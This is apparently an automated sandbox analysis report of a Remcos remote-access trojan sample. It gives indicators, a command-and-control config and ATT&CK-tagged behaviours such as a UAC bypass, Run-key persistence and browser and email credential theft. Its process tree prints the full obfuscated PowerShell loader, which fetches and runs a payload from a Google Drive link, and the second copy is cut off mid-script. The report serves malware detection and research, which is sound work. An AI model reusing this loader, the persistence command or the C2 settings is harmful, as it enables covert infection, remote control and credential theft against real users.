remcos | 1bd88defe4347880e470dc8536cab819495a34c4320b1dac9fa4952e730f0962

Analysis

max time kernel
119s
max time network
101s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
02-12-2024 13:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1bd88defe4347880e470dc8536cab819495a34c4320b1dac9fa4952e730f0962N.vbs
Size

33KB
MD5

d6f45ebf3891c5dbabcc90063267a500
SHA1

e5943a4dcacd697d58287bf70e45cf054015e881
SHA256

1bd88defe4347880e470dc8536cab819495a34c4320b1dac9fa4952e730f0962
SHA512

25952f18ea9a949b745de4822e9a6830ea6c16d643d996db9275f8be7bc10be70a40581b48034be5ebd07720f229b54b38b7effa4e274c9a795314669a388cff
SSDEEP

768:YNdasoF+ZTskr3M28uNK7Rkc94VhNxLKe9KhZh9H5u7jCx4GVVBXgdrnGu:6dasOaAkrHoNYjbU/z9jQdCu

Score

10^/10

remcos remotehost collection credential_access discovery evasion execution persistence rat stealer trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

8766e34g8.duckdns.org:3782

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-93TSMD
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

Processes:

resource	yara_rule
behavioral2/memory/4328-99-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/3148-90-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/4828-93-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral2/memory/3148-90-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral2/memory/4828-93-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 13 IoCs

Processes:

WScript.exepowershell.exemsiexec.exe

flow	pid	Process
4	2156	WScript.exe
13	4464	powershell.exe
19	4464	powershell.exe
40	2604	msiexec.exe
42	2604	msiexec.exe
44	2604	msiexec.exe
47	2604	msiexec.exe
48	2604	msiexec.exe
52	2604	msiexec.exe
53	2604	msiexec.exe
54	2604	msiexec.exe
55	2604	msiexec.exe
57	2604	msiexec.exe

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

Processes:

msedge.exemsedge.exemsedge.exemsedge.exeChrome.exeChrome.exeChrome.exeChrome.exemsedge.exe

pid	Process
4812	msedge.exe
3844	msedge.exe
3344	msedge.exe
4144	msedge.exe
936	Chrome.exe
2160	Chrome.exe
3616	Chrome.exe
1500	Chrome.exe
4172	msedge.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

msiexec.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%baggrundshistorien% -windowstyle 1 $Lagertilgangens=(gp -Path 'HKCU:\\Software\\Alperoses\\').Inddrev;%baggrundshistorien% ($Lagertilgangens)"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
4464	powershell.exe
4332	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
13	drive.google.com
40	drive.google.com
11	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

msiexec.exe

pid	Process
2604	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exemsiexec.exe

pid	Process
4332	powershell.exe
2604	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

msiexec.exe

description	pid	Process	procid_target
PID 2604 set thread context of 4828	2604	msiexec.exe	116
PID 2604 set thread context of 3148	2604	msiexec.exe	118
PID 2604 set thread context of 4328	2604	msiexec.exe	120

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

reg.exemsiexec.exemsiexec.exepowershell.exemsiexec.execmd.exereg.execmd.exemsiexec.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exeChrome.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exe

pid	Process
3932	reg.exe
432	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exemsiexec.exemsiexec.exemsiexec.exeChrome.exe

pid	Process
4464	powershell.exe
4464	powershell.exe
4332	powershell.exe
4332	powershell.exe
4332	powershell.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
4828	msiexec.exe
4828	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
4328	msiexec.exe
4328	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
4828	msiexec.exe
4828	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
936	Chrome.exe
936	Chrome.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe

Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

powershell.exemsiexec.exe

pid	Process
4332	powershell.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe
2604	msiexec.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

msedge.exe

pid	Process
4172	msedge.exe
4172	msedge.exe
4172	msedge.exe
4172	msedge.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

Processes:

powershell.exepowershell.exemsiexec.exeChrome.exe

description	pid	Process
Token: SeDebugPrivilege	4464	powershell.exe
Token: SeDebugPrivilege	4332	powershell.exe
Token: SeDebugPrivilege	4328	msiexec.exe
Token: SeShutdownPrivilege	936	Chrome.exe
Token: SeCreatePagefilePrivilege	936	Chrome.exe
Token: SeShutdownPrivilege	936	Chrome.exe
Token: SeCreatePagefilePrivilege	936	Chrome.exe
Token: SeShutdownPrivilege	936	Chrome.exe
Token: SeCreatePagefilePrivilege	936	Chrome.exe
Token: SeShutdownPrivilege	936	Chrome.exe
Token: SeCreatePagefilePrivilege	936	Chrome.exe
Token: SeShutdownPrivilege	936	Chrome.exe
Token: SeCreatePagefilePrivilege	936	Chrome.exe
Token: SeShutdownPrivilege	936	Chrome.exe
Token: SeCreatePagefilePrivilege	936	Chrome.exe
Token: SeShutdownPrivilege	936	Chrome.exe
Token: SeCreatePagefilePrivilege	936	Chrome.exe
Token: SeShutdownPrivilege	936	Chrome.exe
Token: SeCreatePagefilePrivilege	936	Chrome.exe
Token: SeShutdownPrivilege	936	Chrome.exe
Token: SeCreatePagefilePrivilege	936	Chrome.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

Chrome.exemsedge.exe

pid	Process
936	Chrome.exe
4172	msedge.exe
4172	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

msiexec.exe

pid	Process
2604	msiexec.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exemsiexec.execmd.execmd.exeChrome.exe

description	pid	Process	procid_target
PID 2156 wrote to memory of 4464	2156	WScript.exe	85
PID 2156 wrote to memory of 4464	2156	WScript.exe	85
PID 4332 wrote to memory of 2604	4332	powershell.exe	102
PID 4332 wrote to memory of 2604	4332	powershell.exe	102
PID 4332 wrote to memory of 2604	4332	powershell.exe	102
PID 4332 wrote to memory of 2604	4332	powershell.exe	102
PID 2604 wrote to memory of 3424	2604	msiexec.exe	106
PID 2604 wrote to memory of 3424	2604	msiexec.exe	106
PID 2604 wrote to memory of 3424	2604	msiexec.exe	106
PID 3424 wrote to memory of 3932	3424	cmd.exe	109
PID 3424 wrote to memory of 3932	3424	cmd.exe	109
PID 3424 wrote to memory of 3932	3424	cmd.exe	109
PID 2604 wrote to memory of 4044	2604	msiexec.exe	111
PID 2604 wrote to memory of 4044	2604	msiexec.exe	111
PID 2604 wrote to memory of 4044	2604	msiexec.exe	111
PID 4044 wrote to memory of 432	4044	cmd.exe	113
PID 4044 wrote to memory of 432	4044	cmd.exe	113
PID 4044 wrote to memory of 432	4044	cmd.exe	113
PID 2604 wrote to memory of 936	2604	msiexec.exe	114
PID 2604 wrote to memory of 936	2604	msiexec.exe	114
PID 936 wrote to memory of 3144	936	Chrome.exe	115
PID 936 wrote to memory of 3144	936	Chrome.exe	115
PID 2604 wrote to memory of 4828	2604	msiexec.exe	116
PID 2604 wrote to memory of 4828	2604	msiexec.exe	116
PID 2604 wrote to memory of 4828	2604	msiexec.exe	116
PID 2604 wrote to memory of 4828	2604	msiexec.exe	116
PID 2604 wrote to memory of 1492	2604	msiexec.exe	117
PID 2604 wrote to memory of 1492	2604	msiexec.exe	117
PID 2604 wrote to memory of 1492	2604	msiexec.exe	117
PID 2604 wrote to memory of 3148	2604	msiexec.exe	118
PID 2604 wrote to memory of 3148	2604	msiexec.exe	118
PID 2604 wrote to memory of 3148	2604	msiexec.exe	118
PID 2604 wrote to memory of 3148	2604	msiexec.exe	118
PID 2604 wrote to memory of 3636	2604	msiexec.exe	119
PID 2604 wrote to memory of 3636	2604	msiexec.exe	119
PID 2604 wrote to memory of 3636	2604	msiexec.exe	119
PID 2604 wrote to memory of 4328	2604	msiexec.exe	120
PID 2604 wrote to memory of 4328	2604	msiexec.exe	120
PID 2604 wrote to memory of 4328	2604	msiexec.exe	120
PID 2604 wrote to memory of 4328	2604	msiexec.exe	120
PID 936 wrote to memory of 4940	936	Chrome.exe	122
PID 936 wrote to memory of 4940	936	Chrome.exe	122
PID 936 wrote to memory of 4940	936	Chrome.exe	122
PID 936 wrote to memory of 4940	936	Chrome.exe	122
PID 936 wrote to memory of 4940	936	Chrome.exe	122
PID 936 wrote to memory of 4940	936	Chrome.exe	122
PID 936 wrote to memory of 4940	936	Chrome.exe	122
PID 936 wrote to memory of 4940	936	Chrome.exe	122
PID 936 wrote to memory of 4940	936	Chrome.exe	122
PID 936 wrote to memory of 4940	936	Chrome.exe	122
PID 936 wrote to memory of 4940	936	Chrome.exe	122
PID 936 wrote to memory of 4940	936	Chrome.exe	122
PID 936 wrote to memory of 4940	936	Chrome.exe	122
PID 936 wrote to memory of 4940	936	Chrome.exe	122
PID 936 wrote to memory of 4940	936	Chrome.exe	122
PID 936 wrote to memory of 4940	936	Chrome.exe	122
PID 936 wrote to memory of 4940	936	Chrome.exe	122
PID 936 wrote to memory of 4940	936	Chrome.exe	122
PID 936 wrote to memory of 4940	936	Chrome.exe	122
PID 936 wrote to memory of 4940	936	Chrome.exe	122
PID 936 wrote to memory of 4940	936	Chrome.exe	122
PID 936 wrote to memory of 4940	936	Chrome.exe	122
PID 936 wrote to memory of 4940	936	Chrome.exe	122
PID 936 wrote to memory of 4940	936	Chrome.exe	122

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1bd88defe4347880e470dc8536cab819495a34c4320b1dac9fa4952e730f0962N.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Handball='Pseudonavicular';;$Spondylexarthrosis='Tyrannerne';;$Reweighed='Tornadoerne';;$Widriks='Ensuant';;$Sparkede='Dewanny';;$Sonder=$host.Name;function Burntweed($Sproggrnsernes){If ($Sonder) {$Landgang=4} for ($Seneskeden=$Landgang;;$Seneskeden+=5){if(!$Sproggrnsernes[$Seneskeden]) { break }$Ballparks+=$Sproggrnsernes[$Seneskeden]}$Ballparks}function Uniformistisk86($Sandflugters){ .($Perspektiverings) ($Sandflugters)}$bilinigrin=Burntweed ' epon HoneHavaTMygg.EverwWl.nEL.baBAm.jCYoselBodliSinge dun AniT';$Mercia=Burntweed ',omhM T po CovzEmuliFjellOperlM.laaAlle/';$Forretningsomraades=Burntweed 'OrthTFlysl Inas Eft1Resu2';$Certificering=' aan[Paten kaEVexeT.ele.PromSPeddePostrSlurVStteIOverc DagEMa ePS.nkO TamIDicanrucgTDe amAnstADisiNExt aIns GKenseMul r Int] Svr: Ind: aftspa aeProlC visuzollRBg,riHeroTTotayLomep TrarKlinOIlliTParaOT,llcN npO ShaLSne,=Pahl$ ,okFFlo Oa,tirRullRsupeEDia,TArgiN apei c.un.bjeg,irrsForeO u hm zurrBiotASterAOpsidNonieA.kyS';$Mercia+=Burntweed 'Fr e5S,nd.Vann0Smer Geog( AarWI.lti,xpinFa hdRunwo SnkwLidls Am. bentNDdseT nge Biwe1 St,0Strm.To.e0 maj;Plum ugWBrygiSa,en ber6Str.4 rbe;Papi b stxDedu6go e4Heir;Kirs Wr arChirvAsco:U,su1 ota3Tort1 Ber. Act0 Vkk)L,gg Col G DekeS ikcHerakFibeograv/Kalf2Stan0 lag1Pot,0Af,y0Nymp1Pro,0Unsc1Live Thu FMetaiKv.nrBrize EthfL veoGdenxdura/Livs1R fo3Gamb1Like.Udfl0';$Phalerate219=Burntweed 'ThorUWricS BruEryt,rFlle-FlleaMar GTopve.hanNFortt';$Tumpline=Burntweed 'Forfh.ntit llytQuadp usss Dak: Sai/Reat/Linjd subrge.li tudv mtseKnip.Enklgdigno HoloSvipgFormlLaane tel.Prerc UdsoidiomRegr/sinuuFagrcPred? Ge e socxLampp F ioO,errKlumtParc=Smled AltoRomawEbonnHylelPeepoUndea Bn.dAffi&DagdiP stdAma,=Jubi1 Spe4 AnoM A i4UdkrI VenFBrigOAnfghre,u1 HjeLUntrYFo,k9VaanSIsl,D PugULys nGlemxFruezCad KRa,gJvelb8Beam4Gapl7Tacka Var4 can7GranX Daaytri j ChaELocuECombl EliM';$Outhearing=Burntweed 'Over>';$Perspektiverings=Burntweed 'GeneiSp ge Mamx';$Sybotic='Retspraksisers';$Gisant='\Regionplanloves116.Hal';Uniformistisk86 (Burntweed 'Forr$S.imGMisrL Gulo.tteb By,AMea lHol.:PolyCF.ydOGrn n rugT .ftiMaloNEpi UC gnaSteptVeste KulnKr dEKo tSIndeSS nh9neut1.rdr=Ball$ PanE AfsNSimpvScot: FeaAVallp twap SanDIndga RaptBeviaElek+aspi$ChopgZi miTff sFlnsADimsN A tt');Uniformistisk86 (Burntweed 'Xmlr$ SkrgNe.bLCanaODoolBK ugA.omblAn e:QuirlOverE La G St,I ,ogt SnoISt.dMPr fIAf.az FibeRntgr g.n8Efte3Opht=Vens$MototOv.ruRo aMReinpRufuLRariI ,aanMuddERefl..odhsBenepWeasLSkbniRevitSolb(Gar,$UnemoStufUCuestT maHDebuE.ommaBe,oRDevai vernU plGLang)');Uniformistisk86 (Burntweed $Certificering);$Tumpline=$Legitimizer83[0];$Disnature9=(Burntweed 'U co$AndrGChorLUnl oKapiBHemoA Co l,emi:SkytGTilse asensno FXebeoFoerrDe esR.ciI drkTem R Voli VinNOmniG teoe SilRUngaN dle AfksP,rt=SndanH rsEChrowFo.s-RockoS mmBScraJParlEspecc U,etVani Sa sAbavy AgosS ortBefrePeriMMesm.Bora$Stinbc raIUnivL .ouIFortNOveriPanigYc.arD ssINstmN');Uniformistisk86 ($Disnature9);Uniformistisk86 (Burntweed '.ati$M noG rakeBiognparafKderob llrForesinveigal ksalprEuroiProcnD magKo teDockrkonon fa e rosH be.DiacH laueAninaS.opdT,leeU orrServsRump[Fl s$ lapPExcihIndeaBe ol IntePyrsrGenoaCivitC,lle ,lm2Aer,1 Dys9Firh] akv=fins$ SupMIsureOphirm hmcS.rmioptra');$Corrading=Burntweed 'I df$AltiGRovee Pacn ndsfPlseoSki rArvesR.geiU.ytkAutor Legi be n BorgKirkeYar,rTelen rooePectsTurn.CullDS rvoLandwSlaanIstalF,reou.elaClerdRefoFVizsiUdmal F oeMisu(Sub.$ImprT .anu HurmVrnep txulNynni ordnSpleebutt,Come$ResiVBjrga BetsGausa isklrestlUrkoeAfh rP,annHasteRemp)';$Vasallerne=$Continuateness91;Uniformistisk86 (Burntweed ' Van$M isG Tosl Mico SucbFizzaDi tlPo,y:Mn tTVaa,eEmprL L.vtJa.bHDugdOBugsL.amidPortebeverEpikeSt pSForp=Chef( ennTRutiE AllSKon.tSynt-St pPGlamaLib.T PerH iga Spi$F avVStaba abeSS ara.pruL .lgldan EDis RSupinc,rbE.aro)');while (!$Teltholderes) {Uniformistisk86 (Burntweed 'Gene$BordgTilvlheteoRodobP ogaafdalHypo:GritSBy,njMetaoB rofUdvaeUnderln.ntEfteetopp1Oven9Hjem4Tube=Mika$sulfB A seOptesTilstSkamoPr grUnmimf,rle Forl armsHavieSamdnT ers') ;Uniformistisk86 $Corrading;Uniformistisk86 (Burntweed 'TempsRgestAll aFichR.isaTosch- sulsDe,lLKurseLa rePalePmese Over4');Uniformistisk86 (Burntweed 'Meni$En uG TetLSen,oOverBAkryA BibLI.vo:Hat T Me eEpicLGnetT epeh,ophoBoksl ZiadFl.rE SacrLaaneForbsVen =Opva( BletFigeeUndgSBedrtKimm-For p Fava aptInh Hvedh Enva$S llv shoAFlamSMdelAO.thL EnhLIreneAtesRCampNNonaELept)') ;Uniformistisk86 (Burntweed 'Sulf$PopuGTa,tLUnc OStitB MarAMaskLShar:KredsNomit allOLsblr BrikCot.B TieSBash=For $ revGS,erLtoshODaabBN ncaStralblac: okkmAboreAm lLLu,aL Ou E e,eM RhysVaabT QuiaJenmDturmIAlarEGrmmrMoti+Chry+Ma i%Moni$Bo rlmu aeUvedgBestistarTTastiAlgoM BaniDramZRetleCribRHols8Inst3 ilt.Resec iljoJudau,uasnTospT') ;$Tumpline=$Legitimizer83[$storkbs]}$Seneskedenntrudress=320480;$Personificerede=30318;Uniformistisk86 (Burntweed 'Swan$S.dlGStilLLedeoTidsB Giga.rveLUros:ReprA Chon SubiTse S agB BruoUnreLAryaC EsuhEft eBaghSQuib Waft=Reac UrdeGRasteHrf.TStvn-huleC.rneOTo,bnM ndTSlamE Godn nrat eas Afsk$OppeVMetaAud.mS orba P alkovelUltrEFro RUnrun Deke');Uniformistisk86 (Burntweed ' Sm $ Se g F.llPhy oRengb DiraMerclFond:HuslSCoatlUnthuUnegbS rmr EntePatatCyli Syn =St i Gru [Co tS Na,yDrm.sWar.t En eBranmtouc. Wo.C ccroschwnHurrvInteeUnc rPr ttCh o]Psy,:Hen :Sn rFl forCowboHandm jerBDestaEffes Mule onc6 Unt4YnglSUnpotBendr ,roiTandnPlumg .no(Udvi$StavaStavnFilmiTho,sSpeabGilloMicrlDiv c PhahordneU imsMart)');Uniformistisk86 (Burntweed 'Hnde$ FodG.ndul FakOP,anb OttAOverlTe e: BygS Volp OmoEgrydk Bact emiRAr oO SynGActiR KonaPodof ModeN.tenBefosUnvi Ska =P ot Un,a[T adsYderyTegnSHe it SkyeUnenmBe,k.Ozelt oveE ParX onTFrit. naEPorknS.ntCPrepOSel.DSkumI ChenForhgRust]Kloa:Noum:LyseALangS,vilcSyleIThisi O j. Kung,upeESu,etShipSAndeT B sR PlaI UnsnSnozg Sat(I df$SkrusIterLTaxiUKommbTyngR DoneIntotUnri)');Uniformistisk86 (Burntweed 'Excu$LinkgAlveL P roSvanBB reAVandl.hri:MateCke kE E.sR yrseKommmWildo KarN BijIS reaGrunlWaspIIntesCoe,MFo d=Unde$Ti.bSCy lpcoacESunskUnaltVelbRSultOProggIne rMineAAferFR ceEfagbNTimbSCavi.neglsEkskUNectBSjussBasttprecrJagtiUns.NUdlaGUnde(Bede$ForeSDiste jesNMiekEHjl,SRe,ik Enge B.lDS orEFo aNArc N FarTSt lRTunguFlerDAfbrrCh.ieSa as Atts un, ety$enk.P BehE ubvrSileSFiluo Gr NClauIHaidFUnr IJordCAnt.eUpg RAspieRelaD,iffEfrad)');Uniformistisk86 $Ceremonialism;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4464

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Handball='Pseudonavicular';;$Spondylexarthrosis='Tyrannerne';;$Reweighed='Tornadoerne';;$Widriks='Ensuant';;$Sparkede='Dewanny';;$Sonder=$host.Name;function Burntweed($Sproggrnsernes){If ($Sonder) {$Landgang=4} for ($Seneskeden=$Landgang;;$Seneskeden+=5){if(!$Sproggrnsernes[$Seneskeden]) { break }$Ballparks+=$Sproggrnsernes[$Seneskeden]}$Ballparks}function Uniformistisk86($Sandflugters){ .($Perspektiverings) ($Sandflugters)}$bilinigrin=Burntweed ' epon HoneHavaTMygg.EverwWl.nEL.baBAm.jCYoselBodliSinge dun AniT';$Mercia=Burntweed ',omhM T po CovzEmuliFjellOperlM.laaAlle/';$Forretningsomraades=Burntweed 'OrthTFlysl Inas Eft1Resu2';$Certificering=' aan[Paten kaEVexeT.ele.PromSPeddePostrSlurVStteIOverc DagEMa ePS.nkO TamIDicanrucgTDe amAnstADisiNExt aIns GKenseMul r Int] Svr: Ind: aftspa aeProlC visuzollRBg,riHeroTTotayLomep TrarKlinOIlliTParaOT,llcN npO ShaLSne,=Pahl$ ,okFFlo Oa,tirRullRsupeEDia,TArgiN apei c.un.bjeg,irrsForeO u hm zurrBiotASterAOpsidNonieA.kyS';$Mercia+=Burntweed 'Fr e5S,nd.Vann0Smer Geog( AarWI.lti,xpinFa hdRunwo SnkwLidls Am. bentNDdseT nge Biwe1 St,0Strm.To.e0 maj;Plum ugWBrygiSa,en ber6Str.4 rbe;Papi b stxDedu6go e4Heir;Kirs Wr arChirvAsco:U,su1 ota3Tort1 Ber. Act0 Vkk)L,gg Col G DekeS ikcHerakFibeograv/Kalf2Stan0 lag1Pot,0Af,y0Nymp1Pro,0Unsc1Live Thu FMetaiKv.nrBrize EthfL veoGdenxdura/Livs1R fo3Gamb1Like.Udfl0';$Phalerate219=Burntweed 'ThorUWricS BruEryt,rFlle-FlleaMar GTopve.hanNFortt';$Tumpline=Burntweed 'Forfh.ntit llytQuadp usss Dak: Sai/Reat/Linjd subrge.li tudv mtseKnip.Enklgdigno HoloSvipgFormlLaane tel.Prerc UdsoidiomRegr/sinuuFagrcPred? Ge e socxLampp F ioO,errKlumtParc=Smled AltoRomawEbonnHylelPeepoUndea Bn.dAffi&DagdiP stdAma,=Jubi1 Spe4 AnoM A i4UdkrI VenFBrigOAnfghre,u1 HjeLUntrYFo,k9VaanSIsl,D PugULys nGlemxFruezCad KRa,gJvelb8Beam4Gapl7Tacka Var4 can7GranX Daaytri j ChaELocuECombl EliM';$Outhearing=Burntweed 'Over>';$Perspektiverings=Burntweed 'GeneiSp ge Mamx';$Sybotic='Retspraksisers';$Gisant='\Regionplanloves116.Hal';Uniformistisk86 (Burntweed 'Forr$S.imGMisrL Gulo.tteb By,AMea lHol.:PolyCF.ydOGrn n rugT .ftiMaloNEpi UC gnaSteptVeste KulnKr dEKo tSIndeSS nh9neut1.rdr=Ball$ PanE AfsNSimpvScot: FeaAVallp twap SanDIndga RaptBeviaElek+aspi$ChopgZi miTff sFlnsADimsN A tt');Uniformistisk86 (Burntweed 'Xmlr$ SkrgNe.bLCanaODoolBK ugA.omblAn e:QuirlOverE La G St,I ,ogt SnoISt.dMPr fIAf.az FibeRntgr g.n8Efte3Opht=Vens$MototOv.ruRo aMReinpRufuLRariI ,aanMuddERefl..odhsBenepWeasLSkbniRevitSolb(Gar,$UnemoStufUCuestT maHDebuE.ommaBe,oRDevai vernU plGLang)');Uniformistisk86 (Burntweed $Certificering);$Tumpline=$Legitimizer83[0];$Disnature9=(Burntweed 'U co$AndrGChorLUnl oKapiBHemoA Co l,emi:SkytGTilse asensno FXebeoFoerrDe esR.ciI drkTem R Voli VinNOmniG teoe SilRUngaN dle AfksP,rt=SndanH rsEChrowFo.s-RockoS mmBScraJParlEspecc U,etVani Sa sAbavy AgosS ortBefrePeriMMesm.Bora$Stinbc raIUnivL .ouIFortNOveriPanigYc.arD ssINstmN');Uniformistisk86 ($Disnature9);Uniformistisk86 (Burntweed '.ati$M noG rakeBiognparafKderob llrForesinveigal ksalprEuroiProcnD magKo teDockrkonon fa e rosH be.DiacH laueAninaS.opdT,leeU orrServsRump[Fl s$ lapPExcihIndeaBe ol IntePyrsrGenoaCivitC,lle ,lm2Aer,1 Dys9Firh] akv=fins$ SupMIsureOphirm hmcS.rmioptra');$Corrading=Burntweed 'I df$AltiGRovee Pacn ndsfPlseoSki rArvesR.geiU.ytkAutor Legi be n BorgKirkeYar,rTelen rooePectsTurn.CullDS rvoLandwSlaanIstalF,reou.elaClerdRefoFVizsiUdmal F oeMisu(Sub.$ImprT .anu HurmVrnep txulNynni ordnSpleebutt,Come$ResiVBjrga BetsGausa isklrestlUrkoeAfh rP,annHasteRemp)';$Vasallerne=$Continuateness91;Uniformistisk86 (Burntweed ' Van$M isG Tosl Mico SucbFizzaDi tlPo,y:Mn tTVaa,eEmprL 